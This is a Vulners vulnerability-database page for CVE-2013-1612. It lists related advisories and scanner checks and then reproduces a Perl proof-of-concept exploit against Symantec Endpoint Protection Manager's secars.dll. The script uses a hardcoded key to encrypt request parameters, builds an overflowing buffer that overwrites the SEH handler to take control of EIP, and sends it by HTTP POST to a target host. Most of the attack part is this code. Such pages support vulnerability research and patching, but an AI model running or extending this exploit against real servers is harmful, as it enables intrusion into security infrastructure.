Vulners
Lucene search
Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Symantec Endpoint Protection Manager < 12.1 RU3 Code Execution | 27 Jun 201300:00 | – | nessus |
| Symantec Endpoint Protection Manager < 12.1 RU3 (SYM13-005) (credentialed check) | 19 Jun 201300:00 | – | nessus |
 | Symantec Endpoint Protection Manager secars.dll Buffer Overflow (CVE-2013-1612) | 25 Aug 201400:00 | – | checkpoint_advisories |
 | CVE-2013-1612 | 20 Jun 201301:00 | – | cve |
 | CVE-2013-1612 | 20 Jun 201301:00 | – | cvelist |
 | Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC) | 27 Apr 201400:00 | – | exploitdb |
 | EUVD-2013-1647 | 7 Oct 202500:30 | – | euvd |
 | Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC) | 27 Apr 201400:00 | – | exploitpack |
 | CVE-2013-1612 | 20 Jun 201303:17 | – | nvd |
 | Symantec Endpoint Protection Manager (SEPM) Buffer Overflow Vulnerability | 29 Aug 201300:00 | – | openvas |
10
use warnings;
use strict;
use IO::Socket::INET;
use SEPM::SEPM;
# SEP Manager host/ip
my $host = "192.168.60.186";
my $port = 8014;
# Kcs key
my $Kcs_hex = "85FB05B288B45D92447A3EDCBEFC434E";
# ---- config end -----
# flush after every write
$| = 1;
# Send HTTP request function
sub send_request {
my $param = shift; # URL parameters
my $post_data = shift; # POST DATA
my $sock = IO::Socket::INET->new("$host:$port");
if($sock){
print "Connected.. \n";
# HTTP request
my $req =
"POST /secars/secars.dll?h=$param HTTP/1.0\r\n" .
"User-Agent: Smc\r\n" .
"Host: $host\r\n" .
"Content-Length: " . length($post_data) . "\r\n" .
"\r\n" .
$post_data ;
# Sending
print $sock $req;
# Read HTTP response
my $resp = '';
while(<$sock>){ $resp .=$_; }
#print $resp;
if($resp =~ /400 Bad Request/) {
print "\nERROR: Got '400 Bad Request' from the server. Wrong Kcs key ? Wrong SEP version ?\n";
}
close $sock;
}
}
# SEP object
my $sep = SEPM::SEPM->new();
print "[*] Target: $host:$port\n";
print "[*] KCS Key: $Kcs_hex\n";
# SEPM object for obfuscation
print "[*] Generating master encryption key\n";
$sep->genkey($Kcs_hex);
# Obfuscate URL parameters
print "[*] Encrypting URI\n";
my $h = $sep->obfuscate("l=9&action=26");
# The evil buff
print "[*] Building evil buffer\n";
my $buf =
"foo=[hex]" . # [hex] call the vulnerable parsing function
"F" x 1288 . # Junk
"B" x 8 . # Pointer to next SEH record
"CCCCCCCC". # SEH Handler, will overwrite EIP register
"D" x 500; # Trigger "Memory Access Violation" exception
# Sending request
print "[*] Sending HTTP request\n";
send_request($h, # URL parameters
$buf # post data
);
print "[*] Done\n";
# 0day.today [2018-03-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Apr 2014 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.02704